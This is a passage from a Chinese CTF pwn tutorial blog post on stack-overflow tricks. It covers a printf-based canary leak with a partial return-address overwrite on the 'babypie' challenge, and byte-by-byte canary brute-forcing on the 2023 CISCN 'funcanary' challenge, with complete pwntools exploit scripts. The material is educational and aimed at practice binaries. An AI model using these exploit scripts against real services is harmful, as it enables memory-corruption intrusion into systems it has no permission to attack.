<p>存在Canary保护，read读取0x30字节后到buf后，printf 函数会将其打印出来。存在后门：低三位为 ‘A3E‘</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/p2.png?x-oss-process=style/watermark"
                     
                ></p>
<p>buf大小也为0x30字节，尽管我们不能溢出到返回地址，但是由于Canary在EBP的上面，我们可以利用 printf 函数打印Canary。canary还有一个特点，第一个字符为’\x00’，目的就是为了截断防止泄露出来canary。我们可以将其’\x00’覆盖为一个非零的值。这样就可以打印出canary了。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/b1.png?x-oss-process=style/watermark"
                     
                ></p>
<p>第一次 read 的时候读入的是栈大小为：0x30，我们需要 read 的长度是 0x30-0x8+1。+1是为了覆盖 canary 的最低位为非零的值，printf 使用 %s 的时候遇到 \0 结束，覆盖 canary 低位为非零的值的时候就可以被 canary 打印出来了。</p>
<p>然后我们知道指令后三位是不变的，但是我们覆盖只能一个字节一个字节的覆盖。因此想要覆盖后三位，就会覆盖两个字节，就会把第四位也覆盖了。而每位有16种可能，也就是说，有1&#x2F;16的概率，覆盖的第四位刚好等于系统随机化后的数据。因此可以多次尝试，有概率拿到flag。</p>
<p>exp如下：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"> </span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">	<span class="comment">#io=process(&#x27;./babypie&#x27;,timeout = 1)</span></span><br><span class="line">        io = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="number">25428</span>)</span><br><span class="line">        io.sendafter(<span class="string">&quot;:\n&quot;</span>, <span class="string">&quot;A&quot;</span> * (<span class="number">0x30</span> - <span class="number">0x8</span> + <span class="number">1</span>))</span><br><span class="line">        io.recvuntil(<span class="string">&quot;A&quot;</span> * (<span class="number">0x30</span> - <span class="number">0x8</span> + <span class="number">1</span>))</span><br><span class="line">        canary = <span class="string">&#x27;\0&#x27;</span> + io.recvn(<span class="number">7</span>)</span><br><span class="line">        success(<span class="string">&quot;0x&quot;</span> + canary.encode(<span class="string">&quot;hex&quot;</span>))</span><br><span class="line">        io.sendafter(<span class="string">&quot;:\n&quot;</span>, <span class="string">&quot;A&quot;</span> * (<span class="number">0x30</span> - <span class="number">0x8</span>) + canary + <span class="string">&quot;B&quot;</span> * <span class="number">8</span> + <span class="string">&#x27;\x3E\x0A&#x27;</span>)</span><br><span class="line">        io.interactive()</span><br><span class="line">    <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">        io.close()</span><br><span class="line">        <span class="built_in">print</span> e</span><br></pre></td></tr></table></figure></div>

<p>多次尝试后得到flag：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/p3.png?x-oss-process=style/watermark"
                     
                ></p>
<p>事实上，由于题目的特性，read函数指向后，返回的地址也是’A‘开头的，也就是我们不用覆盖第三位，它已经是一样的了。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/p4.png?x-oss-process=style/watermark"
                     
                ></p>
<p>只要覆盖后两位，就一定可以成功：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">io.sendafter(<span class="string">&quot;:\n&quot;</span>, <span class="string">&quot;A&quot;</span> * (<span class="number">0x30</span> - <span class="number">0x8</span>) + canary + <span class="string">&quot;B&quot;</span> * <span class="number">8</span> + <span class="string">&#x27;\x3E&#x27;</span>)</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/p5.png?x-oss-process=style/watermark"
                     
                ></p>
<h1 id="四、Canary爆破"><a href="#四、Canary爆破" class="headerlink" title="四、Canary爆破"></a>四、Canary爆破</h1><h2 id="4-1-介绍"><a href="#4-1-介绍" class="headerlink" title="4.1 介绍"></a>4.1 介绍</h2><p>在前一篇BROP中我们已经介绍过Canary爆破的原理，复习一下：</p>
<p>Canary爆破原理是，从最低的一个字节开始，逐个字节地改变Canary的值，直到与原始Canary值匹配为止。每次填入一个字节时，程序都会检查是否发生了内存错误或缓冲区溢出。如果填入的值与Canary匹配，则说明该字节是正确的，继续向下爆破。如果填入的值与Canary不匹配，则说明该字节是错误的，需要重新开始爆破。</p>
<p>在32位中，需要爆破四个字节的Canary，只要尝试4×256&#x3D;1024次就一定可以爆破Canary，64位8个字节，只需要尝试 8×256&#x3D;2048 次就一定可以爆破Canary。</p>
<h2 id="4-2-例题"><a href="#4-2-例题" class="headerlink" title="4.2 例题"></a>4.2 例题</h2><p>网上找不到合适的题目，就用之前打比赛的题目吧。</p>
<p>2023ciscn初赛，pwn题：funcanary，我把它上传到阿里云了，题目下载地址：<a class="link"   target="_blank" rel="noopener" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/test/funcanary" >https://wutongblogs.oss-cn-beijing.aliyuncs.com/test/funcanary <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p>拿到题目，首先checksec：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/c1.png?x-oss-process=style/watermark"
                     
                ></p>
<p>保护全开，然后查看反汇编：分析过程不详述了。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/c2.png?x-oss-process=style/watermark"
                     
                ></p>
<p>主函数创建子进程，然后不断执行sub_128A函数。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/c3.png?x-oss-process=style/watermark"
                     
                ></p>
<p>sub_1100是read函数，v3大小0x78，存在溢出。有canary保护。子进程的canary一样，因此可以爆破canary。</p>
<p>爆破代码：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#python3</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">r = process(<span class="string">&#x27;./funcanary&#x27;</span>)</span><br><span class="line">canary = <span class="string">b&#x27;\x00&#x27;</span></span><br><span class="line"><span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">256</span>):</span><br><span class="line">        r.recvuntil(<span class="string">b&#x27;welcome\n&#x27;</span>)</span><br><span class="line">        payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x68</span> + canary + i.to_bytes(<span class="number">1</span>,<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line">        r.send(payload)</span><br><span class="line">        data = r.recv()</span><br><span class="line">        <span class="comment">#print data</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">b&#x27;fun&#x27;</span> <span class="keyword">in</span> data:</span><br><span class="line">            canary+=i.to_bytes(<span class="number">1</span>,<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;canary:&quot;</span>+<span class="built_in">str</span>(canary))</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;success get blasting!&quot;</span>)</span><br></pre></td></tr></table></figure></div>

<p>题目需要GLIBC_2.34的环境，u1s1，这真的很不友好，比赛的时候环境升级来不及，只能远程调试，废了很多时间，哭&#x2F;大哭&#x2F;嘤嘤嘤</p>
<p>换了kali的环境，爆破成功：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/c5.jpg?x-oss-process=style/watermark"
                     
                ></p>
<p>忘了说了，程序存在后门：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/c4.png?x-oss-process=style/watermark"
                     
                ></p>
<p>可以直接拿到flag，PIE只要爆破第四位即可。</p>
<p>完整exp：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r = process(<span class="string">&#x27;./funcanary&#x27;</span>)</span><br><span class="line">canary = <span class="string">b&#x27;\x00&#x27;</span></span><br><span class="line"><span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">256</span>):</span><br><span class="line">        r.recvuntil(<span class="string">b&#x27;welcome\n&#x27;</span>)</span><br><span class="line">        payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x68</span> + canary + i.to_bytes(<span class="number">1</span>,<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line">        r.send(payload)</span><br><span class="line">        data = r.recv()</span><br><span class="line">        <span class="comment">#print data</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">b&#x27;fun&#x27;</span> <span class="keyword">in</span> data:</span><br><span class="line">            canary+=i.to_bytes(<span class="number">1</span>,<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;canary:&quot;</span>+<span class="built_in">str</span>(canary))</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;success get blasting!&quot;</span>)</span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">&quot;debug&quot;</span></span><br><span class="line"><span class="keyword">for</span> m <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">16</span>):</span><br><span class="line">    tmp = m * <span class="number">16</span> +<span class="number">2</span> </span><br><span class="line">    payload = <span class="string">b&#x27;A&#x27;</span>*<span class="number">0x68</span> + canary + <span class="string">b&#x27;B&#x27;</span>*<span class="number">0x8</span>  + <span class="string">b&#x27;\x31&#x27;</span> + tmp.to_bytes(<span class="number">1</span>,<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;welcome\n&#x27;</span>)</span><br><span class="line">    r.send(payload)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&#x27;m = &#x27;</span> + <span class="built_in">str</span>(m))</span><br></pre></td></tr></table></figure></div>

<p>拿到flag：（本地环境，自己写的flag）</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/c6.jpg?x-oss-process=style/watermark"
                     
                ></p>

            </div>

            
                <div class="post-copyright-info">
                    <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> 花式栈溢出技巧</li>
        <li><strong>Author:</strong> wutong</li>
        <li><strong>Created at:</strong> 2023-07-19 10:45:50</li>
        
            <li>
                <strong>Updated at:</strong> 2023-07-30 21:24:04
            </li>
        
        <li>
            <strong>Link:</strong> https://wutong01304.github.io/2023/07/19/tricks/
        </li>
        <li>
            <strong>License:</strong> This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">CC BY-NC-SA 4.0</a>.
        </li>
    </ul>
</div>

                </div>
            

            
                <ul class="post-tags-box">
                    
                        <li class="tag-item">
                            <a href="/tags/Pwn/">#Pwn</a>&nbsp;
                        </li>
                    
                        <li class="tag-item">
                            <a href="/tags/Stack/">#Stack</a>&nbsp;
                        </li>
                    
                </ul>
            

            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                            rel="prev"
                            href="/2023/07/21/RSA/"
                            >
                                <span class="left arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-left"></i>
                                </span>
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">RSA</span>
                                    <span class="post-nav-item">Prev posts</span>
                                </span>
                            </a>
                        </div>
                    
                    
                        <div class="article-next">
                            <a class="next"
                            rel="next"
                            href="/2023/07/17/BROP/"
                            >
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">BROP</span>
                                    <span class="post-nav-item">Next posts</span>
                                </span>
                                <span class="right arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-right"></i>
                                </span>
                            </a>
                        </div>
                    
                </div>
            


            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">花式栈溢出技巧</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%80%E3%80%81Stack-smash"><span class="nav-text">一、Stack smash</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-1-%E4%BB%8B%E7%BB%8D"><span class="nav-text">1.1 介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-2-%E4%BE%8B%E9%A2%98"><span class="nav-text">1.2 例题</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BA%8C%E3%80%81environ"><span class="nav-text">二、environ</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-1-%E4%BB%8B%E7%BB%8D"><span class="nav-text">2.1 介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-2-%E4%BE%8B%E9%A2%98"><span class="nav-text">2.2 例题</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%89%E3%80%81partial-overwrite"><span class="nav-text">三、partial overwrite</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#3-1-%E4%BB%8B%E7%BB%8D"><span class="nav-text">3.1 介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-2-%E4%BE%8B%E9%A2%98"><span class="nav-text">3.2 例题</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%9B%9B%E3%80%81Canary%E7%88%86%E7%A0%B4"><span class="nav-text">四、Canary爆破</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#4-1-%E4%BB%8B%E7%BB%8D"><span class="nav-text">4.1 介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-2-%E4%BE%8B%E9%A2%98"><span class="nav-text">4.2 例题</span></a></li></ol></li></ol>

    </div>
</div>
            </div>
        
    </div>
</div>


                

            </div>
            
            

        </div>

        <div class="main-content-footer">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info">
            &copy;
            
              <span>2023</span>
              -
            
            2023&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">wutong</a>
        </div>
        
        <div class="theme-info info-item">
            <span class="powered-by-container">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" href="https://hexo.io">Hexo</a></span>
                <br>
            <span class="theme-version-container">THEME&nbsp;<a class="theme-version" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.2.1</a>
        </div>
        
        
        
        
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-expand-width flex-center">
            <i class="fa-regular fa-expand"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    


</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/layouts/navbarShrink.js"></script>

<script src="/js/tools/scrollTopBottom.js"></script>

<script src="/js/tools/lightDarkSwitch.js"></script>





    
<script src="/js/tools/codeBlock.js"></script>




    
<script src="/js/layouts/lazyload.js"></script>






  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js"></script>







<div class="post-scripts pjax">
    
        
<script src="/js/tools/tocToggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/layouts/toc.js"></script>

<script src="/js/plugins/tabs.js"></script>

    
</div>


    
<script src="/js/libs/pjax.min.js"></script>

<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax',
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            Global.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            Global.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            Global.refresh();
        });
    });
</script>




</body>
</html>
